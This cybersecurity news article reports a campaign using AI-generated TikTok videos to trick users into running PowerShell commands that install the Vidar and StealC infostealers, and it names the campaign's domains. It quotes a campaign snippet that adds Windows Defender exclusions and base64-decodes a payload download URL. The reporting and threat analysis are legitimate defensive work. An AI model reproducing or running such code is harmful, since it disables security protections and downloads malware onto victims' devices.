Cyber Security News

Hackers Drop Info-Stealing Malware On TikTok Users Device Using AI-Generated Videos

Cybercriminals have weaponized artificial intelligence to create sophisticated social engineering attacks on TikTok, using AI-generated tutorial videos to distribute dangerous information-stealing malware that has already reached hundreds of thousands of users across the platform.

Threat actors are exploiting TikTok’s massive user base by creating convincing AI-generated videos that masquerade as legitimate software tutorials, specifically targeting users seeking to unlock pirated applications.

These deceptive videos guide unsuspecting viewers through what appears to be a standard software activation process, but instead tricks them into executing malicious PowerShell commands that silently install dangerous malware variants including Vidar and StealC onto their devices.

The scope of this campaign is particularly alarming, with security researchers documenting that some of these malicious videos have accumulated nearly half a million views, suggesting the potential for widespread compromise across TikTok’s global user community.

The attack represents a significant evolution in social engineering tactics, combining the persuasive power of AI-generated content with the trusted environment of popular social media platforms.

Unlike traditional malware distribution methods that rely on email attachments or suspicious downloads, this campaign leverages the inherent trust users place in video tutorials, making it exceptionally difficult for average users to identify the threat.

Censys analysts noted that the campaign’s infrastructure reveals a sophisticated operation utilizing multiple domains and IP addresses specifically designed to evade detection and maintain persistence.

Further investigation by Censys researchers identified an extensive network of malicious infrastructure supporting this campaign, including domains such as amssh.co, allaivo.me, and winbox.ws, all hosted on a bulletproof hosting provider known as AS214196, which advertises “fast, secure, and anonymous virtual servers with no KYC requirements”.

KYC (Source – Censys)

This hosting arrangement allows cybercriminals to operate with minimal oversight and makes takedown efforts significantly more challenging.

PowerShell-Based Infection Mechanism

The malware’s infection process relies on sophisticated PowerShell scripts that implement multiple evasion and persistence techniques.

When victims execute the provided commands, the malware initializes a multi-stage payload delivery system designed to bypass Windows Defender and establish long-term system access.

Port 443 (Source – Censys)

The core infection script demonstrates advanced obfuscation techniques, utilizing base64 encoding to conceal malicious URLs and implementing retry mechanisms for reliable payload download.

A representative code snippet from the campaign reveals the malware’s methodical approach:-

function Add-Exclusion { param([string]$Path) try { Add-MpPreference -ExclusionPath $Path -ErrorAction SilentlyContinue } catch {} }
$downloadUrl = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("YWxsYWl2by5tZS9jcnlwdGVkLmV4ZQ=="))

This script first disables Windows Defender monitoring for specific directories before downloading the main payload from decoded URLs.

The malware establishes persistence by creating hidden directories in system folders and installing itself as a trusted Windows Update service, ensuring continued operation even after system reboots while maintaining a low profile to avoid detection by security software.

Celebrate 9 years of ANY.RUN! Unlock the full power of TI Lookup plan (100/300/600/1,000+ search requests), and your request quota will double.

Tushar Subhra Dutta

Tushar is a senior cybersecurity and breach reporter. He specializes in covering cybersecurity news, trends, and emerging threats, data breaches, and malware attacks. With years of experience, he brings clarity and depth to complex security topics.

Recent Posts

Microsoft Releases Emergency Windows 11 Update Following Patch Tuesday Bugs

Microsoft has pushed out an emergency, out-of-band Windows 11 update after its September Patch Tuesday…

9 minutes ago

Top 10 Best Cloud Detection & Response (CDR) Solutions in 2026

CDR is the runtime, real-time half of cloud security: while CSPM tells you what’s misconfigured,…

14 minutes ago

Top 10 Best SaaS Security Posture Management (SSPM) Tools in 2026

Your SaaS estate M365, Salesforce, Workday, Slack, hundreds of others is a sprawl of misconfigurations,…

19 minutes ago

Top 10 Best Data Security Posture Management (DSPM) Tools in 2026

DSPM finds sensitive data you didn’t know you had, classifies it, maps who can reach…

25 minutes ago

OpenAI Agent Swarm Linked to 3,022 Malicious RubyGems Packages in GemStuffer Campaign

Open-source packages are meant to save developers time. In the GemStuffer campaign, that trust became…

36 minutes ago

Google Chrome 153 Update Fixes 42 Security Flaws, Including 3 Critical Ones

Google has released an important Chrome 153 security update that fixes 42 vulnerabilities across the…

5 hours ago